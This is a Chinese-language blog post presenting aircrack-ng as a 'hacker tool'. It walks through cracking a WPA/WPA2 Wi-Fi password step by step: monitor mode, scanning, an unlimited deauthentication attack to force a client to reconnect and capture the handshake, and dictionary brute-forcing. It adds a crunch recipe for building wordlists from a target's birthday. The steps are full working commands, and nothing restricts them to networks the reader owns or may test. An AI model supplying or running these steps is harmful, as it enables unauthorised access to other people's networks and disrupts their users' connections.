hello大家好,我是城乡经济网小晟来为大家解答以上问题,小众黑客必备工具有哪些,十大黑客工具之Aircrack很多人还不知道,现在让我们一起来看看吧!
Aircrack- NG是一个完整的工具来评估Wi-Fi网络安全套件。
它专注于WiFi安全的不同领域:
所有的工具都是命令行,它允许重的脚本。很多GUI都利用了这个功能。它主要工作在 Linux,但也支持 Windows,OS X,FreeBSD,OpenBSD,NetBSD以及Solaris甚至eComStation 2。
需要:
关于aireplay-ng的几个参数
aireplay-ng是aircrack-ng套件里的一款抓包工具,aireplay-ng 中集成了10种攻击方式,分别是:
aireplay-ng在后面数据分析环节中担任非常重要的的角色,他的作用是抓取重要数据包,并用于为后面的字典暴击破解。
教程
– 首先,进入系统,打开terminal,更新源。
sudo apt-get update sudo apt-get upgrade
– 安装 aircrack-ng 套件。
注:Kali linux 是自带组件的。
sudo apt-get install aircrak-ng
– 完成后,插入你的网卡,并检测硬件状态。
在terminal里输入:
iwconfig
注意:如果显示:
no wireless extensions.
请检查 是否正确连接 或 安装你的网卡驱动。
– 使用airmon-ng查看你无线网卡。
sudo airmon-ng
因为linux发行版不同,使用的内核也不同,Kali 4.9.0会在界面中多一个phy选项。
找到interface栏,记下你的无线网卡。
我的无线网卡为wlan0。
– 使用airmon-ng开启网卡监听模式。
记下你的monitor名称。
sudo airmon-ng start wlan0
注:例如,我使用的Linux kali 4.9.0-kali4-amd64中无线网卡的monitor为 wlan0mon,老版本则为 mon0。
– 使用airodump-ng扫描信号。
扫描附件的wifi。
sudo airodump-ng wlan0mon
注:airodump-ng <你的monitor名称>
停止扫描,并选取合适的目标
//快捷键 Ctrl C
– 使用airodump-ng监听指定目标频道。
sudo airodump-ng -c 6 -w Desktop/handshake --bssid C0:00:00:00:00:48 wlan0mon
注:airodump-ng -c <AP的频道(如紫色所示)> -w <抓取握手包的存放位置(如黄色所示)> --bssid <AP的MAC地址(如紫色所示)> <你的的monitor名称>
在你的抓取握手包的存放目录会生成4个文件。
注:握手包文件的拓展名为 .cap 如红色方框所示。
然后,你的网卡会开始监听你目标端的频道
注:请注意右上方(日期和时间右边的区域),如红色方框所示。以及在STATION栏中的Client MAC地址,选取一个客户端MAC地址并记录。
– 使用aireplay-ng进行解除认证攻击模式。
在这里有必要补充一下什握手包的概念,握手包指的是采用WPA加密方式的无线AP与无线客户端进行连接前的认证信息包。
一个合法的客户端要连上AP要经历四次握手(ex.2)
上面就是一个合法客户端四次握手的全过程,我们所说的抓握手包,是指抓AP发给合法客户的数据包,和合法客户端加密后发给AP的数据包。所以我们就抓这两个包,当我们有了明文和密文,就可以破解出密钥。
所以我们这里的关键是要发动攻击,迫使合法的客户端断线,进行重新认证,我们趁机抓包。
保持上一个terminal窗口的运行状态,打开一个新的terminal。
sudo aireplay-ng -0 0 -a C0:00:00:00:00:48 -c 18:00:00:00:00:88 wlan0mon
注:aireplay-ng -<攻击模式,我们这里使用 解除认证攻击(黄色区域)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <客户端端的MAC地址> <你的的monitor名称>
这里我使用的是解除认证攻击模式,给客户端无限发送测试包使其下线。当你获取到握手包时,可以使用快捷重点内容键Ctrl C 停止发送测试包。
注:当你获取道握手包时,红色区域会显示”WPA handshake”。
– 关闭监听模式。
sudo airmon-ng stop wlan0mon
– 使用字典进行暴力破解。
sudo aircrack-ng -w Desktop/wordlist.txt Desktop/handshake-01.cap
注:`aircrack-ng -w <字典路径> <握手包路径>
破解速度取决你CPU的核心数和频率
我在虚拟机上使用的i5 6400的速度为 2481.88 k/s(黄色区域)。图中红色区域分别为:跑完字典的剩余时间;完成率;当前尝试的密码。
当密码破解成功时,会在图红色区域位置显示”KEY FOUND!”字样,中括号为AP端的密码。
– (附) 如何制作一个简单字典文件。
在Linux中可以使用crunch来制作一个简单的字典,下面是自作方法。
sudo apt-get install crunch
例如,如果您知道目标的生日是0728(7月28日),并且认为他们以自己的密码包含他们生日,则可以生成一个以0728为结尾的密码列表,方法为@@@@@@@0728。 该字最多可生成11个字符(7个变量和4个固定)密码,然后全部都以0728结尾。
<min> = 最小密码长度。 <max> = 最大密码长度。 <characterset> = 用于生成密码的字符集。 <pattern> = 生成的密码的指定模式。 <outputfile> = 保存字典文件的路径。
注: pattern中可以使用的特殊标记字符(ex.3)
桌面上是我生成字典,就像上面提到的那样,第一个8是我设定字典的最小长度;第二个8是我设定字典的最大长度(如橘色区域),0123456789是生成密码中包含的字符(如黄色区域)。所以,我生成的字典中只包含长度为8的0-9字符集。
– 注意:
wpa/wpa2的密码破解就像是买,破解的成败完全靠运气,不管怎么说,一个强大字典是肯定可以提高破解的成功几率。
注:
window平台上可使用EWSA进行破解,它可以同时使用gpu进行破解运算。
本文就为大家讲解到这里,希望对大家有所帮助。
标签: